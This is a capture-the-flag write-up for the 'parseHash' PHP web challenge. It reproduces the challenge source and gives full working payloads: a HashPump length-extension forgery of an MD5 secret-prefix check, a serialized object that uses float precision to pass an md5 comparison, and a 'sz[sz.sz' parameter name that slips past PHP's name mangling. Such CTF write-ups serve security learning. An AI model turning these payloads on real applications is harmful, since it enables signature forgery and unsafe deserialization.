The First Ganwang Cup Cyber Security Competition [parseHash]

Just along for the ride.
Writing up a few of the web challenges; there are already plenty of writeups online for the misc and other challenges.

Since I didn't write this up right after the competition and the range is now closed, it can't be reproduced any more, so I changed the key value and regenerated the hash. The challenge itself is unchanged.

Source code:

<?php
include("key.php");
class person{
    public $aa;
    public $bb;
    public $username;
    public $password;
    public function __construct($key=''){
        $this->username="jxsz";
        $this->password="jxsz";
        if(strlen($key)==16&&md5($key . urldecode( $this->username .  $this->password)=="2c16349ea6a20496e05fb40e6c128b8b")){
            echo "Welcome";
        }
    }

    public function __destruct(){
        $this->aa = (string)$this->aa;
        if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){
            die("no no no");
        }
        if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){
            echo file_get_contents("/flag");
        }
    }
}
highlight_file(__FILE__);
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
    echo "66666666666";
    unserialize($_GET['sz_sz.sz']);
}

Original challenge:
First, we need to satisfy the following condition to reach the code block that calls unserialize:

if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
    echo "66666666666";
    unserialize($_GET['sz_sz.sz']);
}

Before the deserialization can be reached, look at the constructor:

public function __construct($key=''){
    $this->username="jxsz";
    $this->password="jxsz";
    if(strlen($key)==16&&md5($key . urldecode( $this->username .  $this->password)=="2c16349ea6a20496e05fb40e6c128b8b")){
        echo "Welcome";
    }
}

This can be bypassed with a hash length extension attack.
Conditions for a hash length extension attack:

When you know MD5(secret), you can compute MD5(secret||padding||m') without knowing the secret, where m' is
arbitrary data (it may be empty), || denotes concatenation, and padding is the padding bytes MD5 appends to secret.
The MD5 padding encodes the length of the whole message, so to compute the padding exactly we also need to know the length of the secret.

The scenario can be summarized as follows:

  • The server concatenates a secret with some data and hashes the result with a function such as MD5 to produce a hash value (the so-called signature).
  • The attacker submits data together with a hash value, without knowing the secret.
  • The server concatenates the submitted data with the secret, hashes it, and checks whether the result equals the submitted hash value.

Here the HashPump tool can be used directly to construct the hash length extension payload:
GitHub project address: https://github.com/bwall/HashPump
Since we also have to satisfy strpos(urldecode($other_pwd),"szxy666")>0, we set the appended data to szxy666.

d6659e29cc6a0878d07b19dd29a70ddc
jxsz\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00szxy666

Replace each \x with % and pass the result as the parameters:

pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=d6659e29cc6a0878d07b19dd29a70ddc

The check is bypassed and the page prints 66666666666.
Next, we need to deserialize and bypass the md5 comparison. The compared values are filtered above: their length cannot exceed 5, and the INF|NAN|M_ tricks are blocked by the regex, but the float precision trick still works here:
Reference link: https://www.cnblogs.com/phpper/p/7664069.html
Serialization script:

<?php
class person{
    public $aa;
    public $bb;
}
$float=new person();
$float->aa=0.8 * 7;
$float->bb=7 * 0.8;
// serialize() uses serialize_precision and emits 5.6000000000000005,
// while (string) and md5() use precision=14 and only see 5.6
var_dump(serialize($float));
?>

Construct the payload as follows:

O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}

However, the parameter name in unserialize($_GET['sz_sz.sz']); contains the special character ".". How PHP filters special characters such as "." in parameter names can be seen in this php-src commit: https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified
There we can clearly see that PHP replaces a space, "." or "[" with "_", and the code shows that this replacement is performed only once.
We can exploit exactly this: since a special character is replaced by "_" only once, we change the parameter name to sz[sz.sz. PHP now treats the "[" as the special character and replaces it with "_", and because of that single replacement the "." is left untouched, so the filter is bypassed.
So the parameter name we construct is sz[sz.sz.
Pass the serialized object directly as the value of that parameter. Final payload:

?sz[sz.sz=O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}

Successfully got the flag.

flag{hashparse+sz_sz.sz}


Source: https://blog.csdn.net/qq_36618918/article/details/108544702